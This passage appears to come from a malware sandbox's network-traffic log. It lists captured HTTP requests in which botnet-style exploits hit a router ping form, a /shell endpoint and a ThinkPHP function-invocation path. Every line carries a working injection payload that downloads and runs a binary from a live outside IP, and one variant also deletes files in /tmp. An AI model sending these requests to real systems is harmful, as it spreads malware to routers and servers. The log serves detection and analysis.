| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://212.192.216.45/netlink.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%20selfrep.netlink%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://212.192.216.45/netlink.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%20selfrep.netlink%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://212.192.216.45/netlink.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%20selfrep.netlink%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://212.192.216.45/netlink.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%20selfrep.netlink%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://212.192.216.45/netlink.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%20selfrep.netlink%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://212.192.216.45/netlink.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%20selfrep.netlink%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://212.192.216.45/netlink.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%20selfrep.netlink%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://212.192.216.45/netlink.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%20selfrep.netlink%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://212.192.216.45/netlink.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%20selfrep.netlink%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://212.192.216.45/netlink.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%20selfrep.netlink%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://212.192.216.45/netlink.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%20selfrep.netlink%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://212.192.216.45/netlink.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%20selfrep.netlink%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://212.192.216.45/netlink.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%20selfrep.netlink%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://212.192.216.45/netlink.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%20selfrep.netlink%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://212.192.216.45/netlink.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%20selfrep.netlink%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://212.192.216.45/netlink.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%20selfrep.netlink%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://212.192.216.45/netlink.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%20selfrep.netlink%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://212.192.216.45/netlink.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%20selfrep.netlink%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://212.192.216.45/netlink.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%20selfrep.netlink%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://212.192.216.45/netlink.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%20selfrep.netlink%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://212.192.216.45/netlink.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%20selfrep.netlink%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://212.192.216.45/netlink.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%20selfrep.netlink%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://212.192.216.45/netlink.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%20selfrep.netlink%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://212.192.216.45/netlink.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%20selfrep.netlink%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://212.192.216.45/netlink.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%20selfrep.netlink%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://212.192.216.45/netlink.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%20selfrep.netlink%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://212.192.216.45/netlink.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%20selfrep.netlink%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://212.192.216.45/netlink.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%20selfrep.netlink%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://212.192.216.45/netlink.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%20selfrep.netlink%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
